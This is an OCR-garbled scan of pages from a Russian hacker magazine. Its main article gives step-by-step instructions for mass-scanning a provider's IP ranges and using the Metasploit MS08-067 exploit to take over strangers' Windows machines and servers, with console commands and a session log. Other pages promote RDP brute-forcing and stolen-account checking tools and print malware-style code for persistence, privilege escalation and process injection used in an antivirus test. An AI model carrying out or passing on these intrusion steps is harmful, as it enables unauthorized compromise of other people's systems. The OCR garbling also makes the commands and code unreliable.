

работающие под управлением ѴѴіпсІоѵѵз ХР РгоГеззіопаІ 8Р2 и 5РЗ 
(полный список операционок, подверженных риску, ты можешь 
найти на кЬ.сег1:.огд/ѵи Із/ісІ/827267 ). Но как я понял из написанного, 
все программные продукты мелкомягких могут быть скомпрометиро- 
ваны путем эксплуатации данного бага и по сей день. 

Перейдем к делу — качаем последний релиз Меіазріоіі Ргатеѵѵогк 
на официальном сайте теіазріоіі.сот (или ищем на диске). Перед 
его установкой на компьютере отключаем антивирус. В комплект 
Меіазріоіі Ргатеѵѵогк включен свой собственный сетевой сканер 
портов, хотя для поиска подключенных к сети машин под управле- 



► 068 



ХАКЕР 05 /148/ 201 1 






Ищем и находим описание нагрузок 



Нізіогу 



23 октября 2008 года МісгозоК выпускает«Бюллетень по безопас- 
ности М508-067». Речь шла об уязвимости в службе сервера, 
которая делает возможным удаленное выполнение произволь- 
ного кода (958644). Успешная эксплуатация этой уязвимости 
может позволить хакерам скомпрометировать целевую систему 
под управлением ОС ѴѴіпсІоѵѵз. Да что тут говорить, уязвимость 
М508-067 активно используется взломщиками и в настоящее 
время. Самым известным червем, использующим этууязвимость, 
является СопПскегЛЭоѵѵпасІир в различных его модификациях. 
Компания МісгозоК в свое время даже объявляла премию в раз- 
мере $250 000 за информацию, которая будет способствовать по- 
имке создателя этого червячка. «Но ведь это далекое прошлое!», 
— возразишь ты и будешь отчасти прав. Но только отчасти, так как 
сегодня ситуация не сильно изменилась. 



нием ОС ѴѴіпсІоѵѵз мы можем использовать и внешний сканер птар, 
который также добавлен в дистрибутив и устанавливается одновре- 
менно с Меіазріоіі Ргатеѵѵогк. Итак, запускаем сканер птар, отме- 
тив порт 445, поскольку именно он нам и нужен для дальнейшей экс- 
плуатации уязвимости службы сервера. А что, собственно, мы будем 
сканировать? Ответ достаточно прост — например, можно взять и 
просканировать ІР-префиксы своего провайдера, которые мы с лег- 
костью узнаем на сайте Ьдр.Ье.пеі: в разделе «Ргебхез ІР ѵ4». Для 
использования полученных префиксов в сканере птар, необходимо 
их предварительно скопировать в файл — например, туДзр.М, и 
поместить файл в рабочий каталоге птар. Итак, поехали, команда 
запуска сканера будет выглядеть следующим образом: 

птар -Т4 -А -ѵ -РЕ -Р5445 -РА445 -ІІ_ ту_ізр.ЪсІ: 

Отлично, в результате сканирования мы получили список хостов 
с запущенной службой сервера, которую видно из внешней сети, 
причем она ничем не прикрыта, хотя мелкомягкие еще в 2008 году 
настоятельно рекомендовали блокировать доступ из интернета к 
этому сервису... Интересно, что по каждому хосту птар выдает под- 
робную информацию о типе установленной ОС. 

Виды зііеіі: полезная нагрузка 
тетегргетег и другие 

В настоящее время считается, что полнофункциональный 
Меіегргеіег (МР) существует только под ѴѴіпсІоѵѵз, но на самом деле 
это не совсем так. Существует еще несколько версий МР, реализо- 
ванных на РНР и ЗАѴА. Впрочем, ты и сам можешь стать автором 




05 Ріпдегргіпіз перед глазами. Удобно и понятно :) 

«полезной нагрузки» — например, скомпилировать ТСІ_-сценарий 
зЬеИ-кода для Сізсо 105 с помощью утилиты Ісірго.ехе и в дальней- 
шем использовать его для жестоких игр с железными кошками. Как 
так? Сам не понимаю :). 

Стандартную полезную нагрузку МР можно использовать почти со 
всеми ѴѴіпсІоѵѵз-эксплойтами, включенными в Меіазріоіі Ргатеѵѵогк, 
выбрав одну из следующих полезных нагрузок: 

Кратко поясню суть каждой. 

1. Ьіпсі_те1егргеІег — резервирует порт на целевой машине и 
ожидает соединения. После установления соединения происходит 
загрузка Меіегргеіег’а на целевой хост, текущее соединение про- 
должает использоваться для связи с удаленной машиной. 

2. геѵегзе_теІегрге1ег — сама соединяется с предварительно 
заданным хостом по указанному порту для дальнейшей загрузки 
Меіегргеіег’а. Затем установленное соединение используется для 
связи с удаленной машиной. Все хорошо, но для успешной реали- 
зации данного метода нам понадобится реальный ІР-адрес (или 
устанавливай проброс нужных тебе портов через І\ІАТ). 

3. РіпсМад — осуществляет поиск дескриптора службы, обработан- 
ной эксплойтом, и использует его для загрузки Меіегргеіег’а на 
удаленную машину, после чего существующее соединение будет 
использовано для связи с ней. Этот вид полезной нагрузки явля- 
ется особенно интересным, поскольку тут не требуется открывать 
новое соединение — таким образом, существует возможность обхо- 
да практически любых конфигураций брандмауэров. 

4. ЫпсМср — это обычный командный интерпретатор типа ст<± 
ехе, естественно, без всяких дополнительных наворотов, каку 
Меіегргеіег'а. Он просто резервирует порт на целевой машине и 
загружает стандартную оболочку. 

В зависимости от цели исследования системы может быть исполь- 
зована любая из этих полезных нагрузок. 

Так чего же мы ждем? Выбираем цель из списка, полученного в 
результате сканирования птар, и подключаемся к ней. Для просто- 
ты эксперимента будем использовать простой командный интерпре- 
татор в качестве полезной нагрузки. 

тзТ > изе ехр1оі1:/ыіпсІоы5/5тЬ/т508_067_пе1:арі 

тзТ ехр1оі1:> зеі: РАУШАй міпгіомз/ѵпсіпдес1:/ЬіпсІ_1:ср 

РАУШАй => міпсІом5/ѵпсіпдес1:/ЬіпсІ_1:ср 

тзТ ехр1оі*(тз08_067_пе1:арі) > зеі: КН05Т 192.168.0.3 

КН05Т => 192.168.0.3 

тзТ ехр1оі1:(т508_067_пе1:арі) > ехріоіі: 

Если уязвимость на удаленной машине существует, то мы полу- 
чим доступ к шеллу (стсі.ехе) этого компьютера, и в окне появится 
сообщение о том, что сессия успешно установлена. В случае, когда 
тзі 1 определил ОС как ѴѴіпсІоѵѵз 7, можно попробовать использовать 
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^ піаі ехріоі > Іоай іокеп_ай<Іи:&е г 

? ( ж | 5уссез-5^о11у \оэУей ріи^і п: кокеп_айёи5е г 
/■5* &хр1от ЕСрі^іхесІ > 5е55іоп5 

I' 

у АсМ ѵе ^ейзіоп^ 



ІіѵГогтаІіісіп 



СоппесЪІоп 



3 те^егрге^г хв6/іп п32 МТ АІЛПШУ УГНЕТЕН ^ І-АВХР01 10. В. 8. 18; 4444 -> 192 > 168 н 8 . 103 г 2764 

4 теУёгргёІег Х36/ИІП92 МТ АУТКО К I ТТ \ ЗУ ЗТЕ Н @ І.А8ХР01 10.8.0.18:4444 -> 192,168.8.100:2765 

т;т схрІоИХрихес] > *океп_э<эйииг гос&зг р-®55у0гйз 
[■) Орс-пі пі^ зеззНоп 3 / 192.168 .6 .100:2764 
(“) АІ^етрМп^ іо эсШ изег ^ооЬзг іо 
|+] ЗиссеззУиІІу зсМес! изег 

[®| >> Ореггіпе зе^зюп 4 / 192.168.8.100:276* 

[ ж | АІЪетрітд Ір эйЙ У5вг і др_Ь*г ід Щр&^ 

I -І 05аг аігеэйу 
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Добавляем юзера средствами РгатеѴѴогк 



64-разрядные полезные нагрузки, которые имеются в соответствую- 
щем разделе (ищем через меню ОШ], или вызвать нагрузку через 
консоль. Пример работы эксплойта с полезной нагрузкой можно 
посмотреть на видео (ищи ролик на нашем диске). 

Захват сервера 

Теперь из списка хостов, сгенерированных птар, выберем ІР-адрес 
под управлением ОС ѴѴіпсІоѵѵз 2003 Зегѵег — это и будет наша искомая 
цель (ведь ты, как настоящий сетевой гуру, хотя бы раз в жизни дол- 
жен поиметь свой собственный дедик!). Для работы с сервером будем 
использовать все тот же эксплойт (ехрІоіі/ѵѵіпсІоѵѵз/зппЬ/ іті 508 _ 067 _ 
пеіарі) и полезную нагрузку ЬіпсЦпеІегргеІег. В результате мы получа- 
ем доступ к командной оболочке через Меіегргеіег, после чего добав- 
ляем нового пользователя с помощью сценария 1океп_абби5ег, пред- 
варительно повысив свои привилегии на удаленной машине до уровня 
5У5ТЕМ с помощью команды иве ргіѵ. Ну вот — у нас есть дедик, к 
которому ты можешь подключаться, используя удаленный рабочий 
стол. На нем мы можем установить прокси-сервер, РТР и многое- 

Результаты сканирования 




многое другое. В ходе эксперимента у меня получилось набрать пять 
дедиков примерно в течение часа. Я думаю, это круто! 

Заключение 

Если кто-то хочет просто жать на кнопку «ехріоіі», чтобы Меіазріоіі 
сразу выдавал готовые дедики, то скажу сразу — этого не будет: 
метод все равно требует времени и терпения. Уязвимость далеко не 
нова, и производители ПО уже приняли меры по ее локализации. 
Так, если на удаленной машине установлен антивирус или правиль- 
но сконфигурирован центр обеспечения безопасности ѴѴіпсІоѵѵз, то 
скорее всего доступ к порту 445 из внешней сети получить просто 
не удастся. В частности, антивирус Касперского отреагирует на 
изменение системных файлов, своевременно информируя об этом 
пользователя. Хотя атака из локальной сети, скорее всего, приведет 
к тому, что система будет полностью скомпрометирована. Несмотря 
ни на что, все еще остается довольно широкое поле для экспери- 
ментов с безопасностью ѴѴіпсІоѵѵз, и ты можешь внести свой вклад в 
это дело. Непоправимый вклад :). т 

Виды полезных нагрузок 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 
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6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


















взлом 



■ ■ Маг (іся 884888, зпіррег.ги) 
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Программа: Рііе Цріоасіег 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/ѴізІа/2008 $егѵег/7 
Автор: Ыарзіег 




Файловые обменники под контро- 
лем 



• работа из контекстного меню; 

• автозаливка на несколько ФО сразу; 

• заливка в свой аккаунт; 

• мультиязычность (КІІ/ЕІМ); 

• кодирование 1о§іп/ра55 перед сохранением 
в файл; 

• работа из трея; 

• поддержка Ога§&йгор; 

• отображение скорости, длительности 
и объема загружаемого; 

• счетчик файлов для загрузки; 

• счетчик загруженных файлов; 

• воможность отмены закачки файла. 

Автор с радостью выслушаеттвои предложения 
и пожелания по работе программы в своем 
блоге: Ыод.пар5І:ег2к.1:к . 



Нетакдавно великолепный сервисзаливки 
файлов на обменники тиШ-ир.сот перестал 
работать со множеством известных сайтов 
(рапидшара, летитбит, сендспейс и другими). 
Из-за этого досадного факта ты наверняка 
задумывался о поиске новых программных 
продуктов та ко го рода. Хорошим решением яв- 
ляется отличная утилита Рііе Иріоабегот кодера 
под ником І\Іарз1:ег. Эта прога можете легкостью 
залитьтвои файлы на более чем два десятка 
файлообменников: 

• 4збагесІ.сот (нужен аккаунт); 

• сІ.ІзазБ.из; 

• сіерозітбіез . сот (нужен аккаунт); 

• сіитр.ги (нужен аккаунт); 

• біевбаге.іп.иа; 

• б1е1:га5Іі . ги; 

• І-Роісіег. ги; 

• Іе'Ьі'ЬЬіІ: . пеі: (нужен аккаунт); 

• те^аиріоасі . сот (нужен аккаунт); 

• ти11:і-ир.сот; 

• орепбіе.ги (нужен аккаунт); 

• гаріеізбаге. сот (нужен аккаунт); 

• гарісІБбаге.сІе (нужен аккаунт); 

• гаріеізбаге. ги (нужен аккаунт); 

• г§Ііо5І:.ги; 

• зепсШе.зи; 

• вепсіврасе. сот (нужен аккаунт); 

• зііі.ги; 

• ирІоасІЬох. сот (нужен аккаунт); 

• ир1оасІіп§. сот (нужен аккаунт); 

• уапсіех.ги (нужен аккаунт). 

Основные возможности аплоадера: 

• ведение списка загруженных файлов; 



Программа: РНРРазйсаппег 
ОС: *піх/\міп 
Автор: Рг.23г0 




В нашем журнале неоднократно описывались 
различные веб-взломы с помощью Веѵегзе-ІР 
сервисов. Во время этих взломовтебе при- 
ходилось выполнять множество монотонных 
действий. Теперь об этом можно забыть! 
Представляю твоему вниманию 
РНРРазіЭсаппег— многопоточный Реѵегзе-ІР 
сканер на РНР Сканер создан специально для 
выполнения всей рутинной работы при взломе 
через Реѵегзе-ІР. 

Основные возможности скрипта: 



• анализ соседей целевого сайта по 
Кеѵегзе-ІР (через Ьіп§.сот); 

• определение используемых движков 
(в базе содержится 68 сигнатур); 

• возможность добавлять свои сигнатуры 
движков в общую базу; 

• поиск рбріп-Ро, рбртуасітіп, зурех сіитрег; 




• сканирование структуры сайта, а также 
вложенное сканирование каталогов; 

• наборы словарей для сканирования 
структуры сайта разбиты по типу файлов и 
по популярности; 

• возможность добавлять свои наборы сло- 
варей для сканирования структуры сканера; 

• метод НЕАй сканирования структуры 
(экономия трафика, а также увеличение 
скорости) ; 

• определение несуществующих страниц по 
коду ответа и методом сравнения содержи- 
мого с заведомо несуществующей 
страницей; 

• раздельная обработка разных расширений 
(уменьшение ложных срабатываний при 
анализе структуры); 

• поддержка Кеер-АІіѵе соединений (увели- 
чение скорости); 

• поддержка многопоточности (увеличение 
скорости) ; 

• понятный интерфейс, множество различ- 
ных настроек, наличие встроенного РАС^. 

Самая интересная особенность в данном 
сканере — это многопоточность. Как пишет 
сам автор, сканер не является многопоточным 
в полном смысле этого слова. В нем исполь- 
зуется параллельная (одновременная) скачка 
страниц. Но в РНРРазіЭсаппег’е это можно 
назвать многопоточностью, так как мы рас- 
параллеливаем самый длительный процесс 
при сканировании — получение ответа от 
веб-сервера. 

Реализована данная фича с помощью ис- 
пользования пула неблокирующих сокетов, 
упоминания о работе с которымты наверняка 
не раз встречал в ][. Для ясности приведу при- 
мер от Рг.ХЗгО. 

Итак, мы хотим скачать три страницы: 

страница 1 - обрабатывается 
веб-сервером 1 секунду; 
страница 2 - обрабатывается 
веб-сервером 2 секунды; 
страница 3 - обрабатывается 
веб-сервером 10 секунд; 

При последовательном скачивании мы за- 
тратим 13 секунд. При параллельном всего 10 
секунд. Таким образом, общее время работы 
равно времени получения самой большой и 
медленной страницы. Остальные интересные 
детали работы сканера описаны в топике авто- 
ра на ПРоПе: доо.дІ/баІгР . 
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Программа: РгееЛЛаіІ 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 $егѵег/7 
Автор: 2.6ег ВіІ Уа 




Проверяем мэйлы 

На очереди очередная мастхэвная (особенно 
для домайнеров и асечников] прога отуже 
известного тебе по предыдущим выпускам 
нашей рубрики автора. Ргее Маіі — этотулза 
для проверки е-таіГов на «свободность» к 
регистрации. Прога уверенно работает со 
следующими почтовыми сервисами: 

• Маіі. пи (таіі.пи, Ьк.пи, Іізі.пи, 
іпЬох. пи); 

• КатЫеп.ни; 

• Аііаз.сі (аііав.сі, тиз'таіі.сг); 

• Сепіпит.сі; 

• Ві^тіп.пеі:; 

• Кт. пи (кт. пи, -Рпеетаіі. пи, ЬоБвтаіІ.ни, 
§іп1таі1.ни, Ьоутаіі.пи, те§аЬох.пи, 
за-РеЬох .пи); 

• Опііпе.иа; 

• Меіа.иа; 

• Хакер. пи; 

• І.иа (і.иа, Ілп.иа, етаіі.иа, 3§.иа); 

• ѴаЬоо.сот; 

• РосЬіа.пи (цір.пи, росЬіа.пи, 
Ьоітаіі.ни, -Рпотпи.сот, ^попі.пи, 
ЬоіЬох.ни, кпоѵаіка . зи, ІапсІ.пи, 
таіІІБ.сот, таіІЗЗЗ.сот, пешіаіі . пи, 
пі§Ы:таі1. пи, пт. пи, різет.пеі:, 
росЬіатІ:. пи, рорЗ.пи, пЬстаіІ.пи, 
зтіір. пи) . 

Функционал программы довольно стандартен: 

• автоматическая генерация логинов для 
проверки; 

• загрузка логинов для проверки из 
файла; 

• возможность сохранения результатов 
чека как в отдельные файлы (для каждого 
домена) , так и в один файл §оосИ:хі:; 

• возможность выбора количества потоков 
для проверки (в бесплатной версии 
только для почты на таіі.пи); 

• быстрая проверка одного логина на вы- 
бранных доменах. 

Также следует отметить, что автор не га- 
рантирует корректную проверку логинов, 
которые не подходят для регистрации на 
конкретном сервисе (например, подлине 



или по употреблению служебных символов]. 
Если у тебя возникнут какие-либо вопросы, 
ты можешь смело задать их на официальной 
страничке проги: доо.дІ/ИЗХГ . 

Программа: СІТ$$-Вгігіе 




ОС: Мпсіоѵѵз 2000/ХР/2003 
5егѵег/ѴІ$*а/2008 5егѵег/7 
Автор: РапкоР 
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ДдпІмД, Лч-5ыЦ. ДОЮ. м Ыіни. 

Правильный брут дедиков 

Раз уж за шла речь о дедиках, немогунепо- 
делиться известнейшим брутфорсом ОТззот 
Ранкора. 

Чем же примечателен этот брутфорс? Тем, что 
он не основан на АсЬѵеХ-компоненте М5Т5 АХ 
Сопігоі, бруте оттеіаГа или каком-либо другом 
внешнем компоненте/софте/библиотеке. Соот- 
ветственно, брут может быть запущен на любой 
ОС семейства ѴѴіпбоѵѵз без дополнительных 
библиотек. 

Собственно брутфорс состоит из двух частей: 

1 . СІІІ -часть — основная. Написана на С++ и ОС 

2. Потокдля брута — написан на С и ѴѴіпОоск’е. 
Вынесен в отдельный файл из-за несовмести- 
мости данного кода на С++ (СИ] и С. 

ВОЗМОЖНОСТИ ПрОГИ: 

• работает на чистом протоколе РШР 
версии 5 от Майкрософта (лишние окна не 
создаются); 

• сканирование указанных диапазонов 
ІР на предмет серверов с открытым 
портом 3389; 

• брут на несколько логинов; 

• кнопка для автоматической генерации 
диапазона, скана и брута; 

• шифрование гудов паролем; 

• 10 потоков в паблик версии; 

• автоматическое убивание потоков; 

• высокая скорость работы и умеренное 
потребление системных ресурсов; 

• прогресс-бары для сканирования и брута. 

При работе с брутом существует один нюанс, 
который состоит в том, что некоторые сер- 
вера при попытке залогиниться отправляют 
код 0 в любом случае (в то мчи сл ей при 
плохом пароле], а некоторые — только при 
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правильном пароле. Если рассматривать 
код 0 как гуд, файл доосІ.Ш быстро заполня- 
ется «левыми» записями с неправильными 
паролями. 

Если же рассматривать его как бэд, появля- 
ется очень маленький шанс пропустить гуд. 
Поэтому право выбора было оставлено ко- 
нечному пользователю — для этого в опциях 
естьдва СЬескВох’а: 

1 . Собе 0: если отмечено, то код 0 будет рас- 
сматриваться как гуд, иначе — как бэд. 
2.5кірСобе2его: если отмечено, то сервер 
будет пропускаться при обнаружении кода 0, 
потому как правильный пароль подобрать не 
удастся. Опция настоятельно рекомендуется 
для повышения скорости! 

Обо всех замеченных багах, а также о любых 
других вопросах, связанных с ОТзз-Вгиіе, ав- 
тор просит отписывать втопике доо.д[/08Ц]х . 

Программа: ОѴаІісІ СЬескег 
ОС: ѴѴЫоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: 2ітрег 




Чекаем дедики 

Авоти очередной многопоточный чекер деди- 
ков на вал ид — ОѴаІіб СЬескег от 2ітрег’а. 
Особенности и возможности чекера: 

• возможность указания в списках для 
чека любых разделителей; 

• сохранение результатов чека в файлы §ооб 
.ЪсЬ, Ьаб.іхі:, ипкпомп .ЪсЬ; 

• указание таймаута; 

• б потоков; 

• 2 вида чека: одиночный и массовый (че- 
кается список из .Ъсі: файла, который можно 
прямиком перетащить на панельку проги); 

• сворачивание в трей; 

• отображение статистики; 

• чек всех ОС; 

• для работы не нужен . ИЕТ Рпатемопк. 

Особое внимание автор проситобратить на 
следующие моменты: 

1. Статус ІІпкпоѵѵп означает, что коннектк 
дедику не удался (в связи с этим статус аккаунта 
остается неизвестным]; 

2. Могут возникнуть следующие случаи с про- 
пусками: 

• ѴѴіпбоѵѵзХР с нехакнутой мультисессией; 

• превышено максимально допустимое количе- 
ство подключений на дедике; 

• закончился установленный таймаут. 

Автор ждет твоих комментариев на официаль- 
ной страничке чекера: похгіпп.сопп/?р=41 5 .пт 
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АѴб 

Агкіі-ѴГгиз 



АѴб 

Агкіі-ѴГгиз 



АѴб 

Апні-ѴІгш 







МАІЛЛ/АКЕ 



I Сергей Греков 



АѴб 

Агні-Ѵіші 



ТЕСТ БЕСПЛАТНЫХ 
ПРОАКТИВОК 

ЕІКшИ аК Ве ^ СИИ ^ ѵа$ *’ ^ ѵ ' га ’ 

о В прошлой статье под пресс нашего редакционного катка попали 
лидеры мирового антивирусного фронта. В этом же выпуске мы 
обратим свои взоры на самые что ни на есть халявные (а потому 
популярные) антивирусные продукты. 



Этим отличия от прошлого теста не ограничатся — мы будем тести- запуска. Если эвристические сигнатуры обычно проверяют наличие 
ровать не эвристику, а проактивную защиту. А что же такое проак- подозрительных особенностей исполняемого образа, эмулируют 
тивная защита? Разные компании используют различные названия: машинный код или вызовы системных функций, то вся проактивка, 

реальная защита, защита в реальном времени и так далее, но суть как правило, следит за активностью файла в системе. В основном 
одна: проверка файла на вредоносность осуществляется в процессе это достигается с помощью перехватов некоторых системных функ- 
его работы. Это и отличает данную технологию от эвристики, задача ций, отвечающих за работу с файлами, реестром, процессами и 
которой состоит в том, чтобы определить статус файла еще до его сетью. 



► 074 



ХАКЕР 05 /148/ 201 1 











о аі/абі!' 



РГКПГЛГІІДЛЦИЯ ПО 

безопасности 




Вы открываете приложение, которое может быть небезопасным, 

Мы настоятельно рекомендуем открыть и о приложение в виртуальной 
среде "песочницы" (еѵагі! іапсіЬси) - это позволит предотвратить риск для 
вашего компьютера. 



Файл: 5атрІе!\НаскеГ'/іг:*.ехе 

Происхождение; 

Чем открыто: С:\Ргодгат Гііеі (х86]\ДИар ^а!атаг>0еі\5аІагпап0.ехе 



ДЕЙСТВИЯ 



Открыть в песочнице (рек ом ен дуется) 



Внимание: все данные, сохраненные вами в песочнице, будут утеряны при ее 
закрытии. 



Запомнить мой выбор для этой программы 
(позже вы сможете изменить этот параметр в настройках программы) 




Кажется, Аваст что-то подозревает! 



В качестве испытуемых были выбраны пять антивирусов. В этом краш- 
тесте я буду пытаться обойти АѴ-продукты от Аѵазі, Аѵіга, АѴО, Сотосіо, 
СІатАѴ. А теперь — немного конкретики о версии каждой программы 
и ее настройках. 

Представляем подопытных 

Аѵіга АпІіѴіг РегзопаІ 

Первый в списке тестируемых антивирусов: Аѵіга АпІіѴіг РегзопаІ — 
Ргее Апбѵігиз. Версия 9.0.0.13. В этом продукте присутствует один 
модуль, который, похоже, выполняет роль проактивной защиты — 
АпІіѴіг биагб. Его я, естественно, включил. Опции довольно скудные, 
помимо настройки «агрессивности» анализа я больше ничего из того, 
что могло бы повлиять на качество защиты в реальном времени, не 
обнаружил. 

аѵазі! РКЕЕ Апііѵігиз 

Следующий подопытный — аѵазі! РРЕЕ Апііѵігиз, версия 1 10319-1 . У 
аваста, в отличие отавиры, есть целая секция «Экраны в реальном 
времени». Я убедился, что все модули (а особенно «Экран поведения» 

— видимо, у аваста проактивная защита именуется именно так), вхо- 
дящие в эту секцию, включены. 

АѴО Апіі-Ѵігиз Ргее ЕгіНіоп 

Последний антивирус в нашем тесте, который начинается на букву «а» 

— АѴО. Я тестировал АѴО Апіі-Ѵігиз Егее Ебіііоп, версия 10.0.1204. Этот 
антивирус не отличается большим количеством настроек. Насколько 

я понял, проактивная защита представлена в компонентах Пезібепі 
ЭЫеІб, Апіі-Рооікіі, Апіі-Ѵігиз и Ібепіііу Ргоіесііоп. 

СІатАѴ 

Продукт Іттипііеі 3.0 от СІатАѴ довольно прост в использовании. 
Большинство настроек представлено габіоЬиІІоп’ами — «да» или 
«нет». Защиту в реальном времени здесь обеспечивает компонент 



Мопііог Ргодгат Эіагі. Я дополнительно включил детектирующий 
движок СІатАѴ, который был по умолчанию отключен. Отмечу, что 
при установке я выбрал версию Егее (Сіоиб + АѴ), а не Тгіаі, которая 
значительно превосходит бесплатный аналог по функциональности. 
Тестировался продукт версии 3.0.0.18. 

Сотого Апііѵігиз Егее 

Последний исследуемый антивирусный продукт — Сотобо Апііѵігиз 
Егее, версии 5.3.181415.1237. В Сотобо, в отличие от предыдущих 
антивирусов, присутствуют очень богатые настройки — интерфейс 
предлагает нашему вниманию огромное количество галочек и пол- 
зунков. Проактивная защита обеспечивается компонентой 0е1епзе+, 
которая также гибко настраивается. Я выбрал максимальный уровень 
защиты, установив Рагапоіб Мобе, который, правда, практически не 
отличается от Бабе Мобе. 

Сама методика тестирования очень простая: каждый тестовый файл 
запускается, а затем я фиксирую (или не фиксирую) предупреждение 
от антивируса. 

А теперь к самому интересному — тестовые файлы. 

Тест первый: прописываемся в 
автозапуск 

Простейший вариант — просто чтобы проверить, работает ли про- 
активная защита вообще. Итак, первый тестовый образец всего лишь 
прописывает сам себя в «святая святых» ѴѴіпбоѵѵз — автозапуск по 
ключу реестра ИкІт\зоІІѵѵаге\ѵѵіпбоѵѵ5\сиггепІѵег5Іоп\гип. Часть исхо- 
дного кода: 

ысІіаг_1: 52Ри11Ра1:Іі[МАХ_РАТН] = {0}; 

Се1:Моби1еРі1еМатеІлІ(0, 52Ри11Ра1:Іі, МАХ_РАТН); 

НКЕУ бКеу = 0; 

Ке§ОрепКеуІлІ(НКЕѴ_ЮСАІ_МАСНІМЕ, 1"5оТТиаге\\Місго50-Р1:\\ 
ІлІіпбоыБХХСиппепІіѴегБІопХХКип'Ч &ІіКеу) ; 
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МАІЛ/ѴАРЕ 





№1 


№2 


№3 


№4 


№5 


Аѵіга 


- 


- 


- 


- 


- 


Аѵа$і 


+ 


+ 


+ 


- 


+ 


АѴ6 


- 


- 


+- 


- 


- 


СІатАѴ 


- 


- 


- 


- 


- 


Сотого 


+ 


+ 


+ 


+ 


+ 



Результаты наших тестов 



ЩИТ Ехі1:Собе = Ке§5е1:КеуѴа1иеІлІ(ІіКеу, 0, Е'^аХ^агеДи^огип" ^ 
КЕС_52, БгРиІІРаТІі, І5І:г1епІлІ(52Ри11Ра1:Іі) +1); 

Алгоритм работы этой программы очевиден — получение полного пути 
самого себя и последующая запись в автозагрузку в реестре. Это один 
из самых популярных у зловредов вариантов добавления программы 
в автозапуск. И каковы результаты? Довольно странно, но самый при- 
митивный способ закрепления зловреда в системе был обнаружен 
только двумя антивирусами: Аѵазі и Сотобо обнаружили угрозу, 
остальные же не помешали записи в авторан. 

Тест второй: получаем права 
отладчика 

Следующий образец я создал, чтобы проверить, как исследуемые 
антивирусы работают с Токеп’ами (цифровыми ключами доступа). С 
этой целью я накидал простую программу, которая выставляет себе 
права отладчика. Фрагмент исходника: 

НАІ\ЮІ_Е ІіТокеп = 0; 

ІІІІМТ пКеТигпСобе = 0; 

ШЮ ІІЮ = {0}; 

ТОКЕІ\І_РКІѴІІ_ЕСЕ5 ТокепРгіѵі1е§е5 = {0}; 

пКеХигпСобе = 0репРгосе55Токеп(Се1:Сиггеп1:Ргосе55( ) , 
Т0КЕІ\І_АІ_І__АССЕ55, &ІіТокеп); 

пКеѣигпСобе = І_оокирРгіѵі1е§еѴа1иеІлІ(0, 5Е_0ЕВие_1\1АМЕ, &ІІЮ) ; 



ІІІІМТ пКеТигпСобе = 0; 

НАІ\ЮІ_Е ІіЕхрІогегРгосеББ = 0, 

МБпарзИоТ: = 0, бКетоТеТбгеаб = 0; 

РКОСЕ55ЕІ\ІТКУ32ІлІ ре32 = {0}; 

ІЯІМТ ЕхрІогегЮ = 0; 

ИЗпарвЬоТ = СгеаТеТоо1бе1р325парБбоТ(ТН32С5_5І\ІАРРКОСЕ55, 0); 
ре32.біл/5І2е = БІгео (РКОСЕ55ЕІЧТКУ32) ; 

Ргосе5532Ріг5Т:Ѵ\І( ИЗпарБІіоТ: ^ &ре32); 

И ( ! І5І:гстріІлІ(ре32. БгЕхеРіІе, І_"ехр1огег.ехе" )) 

ЕхрІогегЮ = ре32.1:Іі32Ргосе55Ю; 

еІБе 

{ 

-Рог( ; пКе1:игпСобе = РгосеББ32І\Іех1:ІлІ(Іі5пар5Ііо1:, &ре32) ;) 

{ 

И (! І5І:гстріІлІ(ре32. БгЕхеРіІе, І_"іехр1оге.ехе" )) 

{ 

ЕхрІогегЮ = ре32.1:Іі32Ргосе55Ю; 

Ьгеак; 

} 

} 

} 

( ! ЕхрІогегЮ) 

геіигп 0; 



ТокепРгіѵі1е§е5 . Ргіѵі1е§еСоип1; = 1 ; 
ТокепРгіѵі1е§е5.Ргіѵі1е§е5[0] . І_иіб = ІІЮ; 
ТокепРгіѵі1е§е5.Ргіѵі1е§е5[0] .АТТгіЬиТеБ = 0; 

пКеіигпСобе = Абз'иБІ:ТокепРгіѵі1е§е5(ІіТокеп, ТаІБе, 
&ТокепРгіѵі1е§е5, 0, 0, 0); 

Код довольно примитивен — получаем токен текущего процесса, а 
затем ему назначаются привилегии отладчика с помощью функции 
АбщзПокепРгіѵіІедез. И что же? Снова Сотобо и Аѵазі справились 
с этой «угрозой», остальные спокойно промолчали. Ситуация весьма 
удручающая. 

Тест третий: инжект в память 
чужого процесса 

Сделаем пример посложнее, а именно — программку, выполняющую 
инжект в память другого процесса. Под «инжектом» я подразумеваю 
выделение памяти в чужом процессе, запись туда своего кода и даль- 
нейший старт удаленного потока. Этот метод можно назвать класси- 
ческим среди современных вирусов, так как он позволяет выполнять 
вредоносные действия «под» доверенным процессом. Фрагмент кода 
программы-образца: 



СІ0БеНапб1е(Іі5пар5Іі0І:); 

ІіЕхрІогегРгосеББ = ОрепРгосеБ5(РКОСЕ55_АІ_І__АССЕ55, 0, 
ЕхрІогегЮ) ; 

РѴОЮ рЕхрІогегМетогу = Ѵігіиа1А11осЕх( 

